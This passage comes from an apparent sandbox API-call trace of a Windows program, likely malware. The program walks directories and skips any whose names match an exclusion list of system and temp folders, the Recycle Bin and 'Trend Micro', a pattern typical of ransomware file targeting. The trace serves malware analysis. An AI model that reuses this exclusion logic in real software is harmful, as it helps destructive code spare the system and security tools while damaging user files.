lpSrch="$RECYCLE.BIN") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="System Volume Information") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="Boot") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="Windows") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="Trend Micro") returned 0x0 [0141.060] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.060] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.061] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.061] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.061] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2948 [0141.061] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef0eb8 [0141.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.061] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0141.061] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0141.061] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="tmp") returned 0x0 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="winnt") returned 0x0 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="temp") returned 0x0 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="thumb") returned 0x0 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="$Recycle.Bin") returned 0x0 [0141.061] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.062] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="System Volume Information") returned 0x0 [0141.062] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="Boot") returned 0x0 [0141.062] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="Windows") returned 0x0 [0141.062] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="Trend Micro") returned 0x0 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2970 [0141.062] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef0f60 [0141.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.062] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0141.062] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0141.063] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="tmp") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="winnt") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="temp") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="thumb") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="$Recycle.Bin") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="System Volume Information") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="Boot") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="Windows") returned 0x0 [0141.063] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="Trend Micro") returned 0x0 [0141.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2998 [0141.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed6a0 [0141.064] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.064] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0141.064] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0141.064] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="tmp") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="winnt") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="temp") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="thumb") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="$Recycle.Bin") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="System Volume Information") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="Boot") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="Windows") returned 0x0 [0141.064] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="Trend Micro") returned 0x0 [0141.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef29c0 [0141.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef1008 [0141.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.065] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0141.065] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0141.065] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="tmp") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="winnt") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="temp") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="thumb") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="$Recycle.Bin") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="System Volume Information") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="Boot") returned 0x0 [0141.065] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="Windows") returned 0x0 [0141.066] StrStrIW (lpFirst="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpSrch="Trend Micro") returned 0x0 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.066] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.066] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.066] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef29e8 [0141.066] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef10b0 [0141.066] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.066] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0141.066] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2=".") returned 1 [0141.066] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="..") returned 1 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="tmp") returned 0x0 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="winnt") returned 0x0 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="temp") returned 0x0 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="thumb") returned 0x0 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="$Recycle.Bin") returned 0x0 [0141.066] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.067] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="System Volume Information") returned 0x0 [0141.067] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="Boot") returned 0x0 [0141.067] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="Windows") returned 0x0 [0141.067] StrStrIW (lpFirst="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpSrch="Trend Micro") returned 0x0 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2a10 [0141.067] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed738 [0141.067] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.067] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0141.067] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2=".") returned 1 [0141.067] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="..") returned 1 [0141.067] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="tmp") returned 0x0 [0141.067] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="winnt") returned 0x0 [0141.067] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="temp") returned 0x0 [0141.067] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="thumb") returned 0x0 [0141.067] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="$Recycle.Bin") returned 0x0 [0141.068] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.068] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="System Volume Information") returned 0x0 [0141.068] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="Boot") returned 0x0 [0141.068] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="Windows") returned 0x0 [0141.068] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="Trend Micro") returned 0x0 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.068] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.068] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.068] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2a38 [0141.068] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed7d0 [0141.068] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.068] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0141.068] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2=".") returned 1 [0141.068] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="..") returned 1 [0141.068] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="tmp") returned 0x0 [0141.068] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="winnt") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="temp") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="thumb") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="$Recycle.Bin") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="System Volume Information") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="Boot") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="Windows") returned 0x0 [0141.069] StrStrIW (lpFirst="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpSrch="Trend Micro") returned 0x0 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.069] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.069] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.069] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2a60 [0141.069] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed868 [0141.069] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.069] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0141.069] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2=".") returned 1 [0141.069] lstrcmpW (lpString1="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="..") returned 1 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="tmp") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="winnt") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="temp") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="thumb") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="$Recycle.Bin") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="System Volume Information") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="Boot") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="Windows") returned 0x0 [0141.070] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="Trend Micro") returned 0x0 [0141.070] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.070] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.070] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.070] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.070] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.070] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, 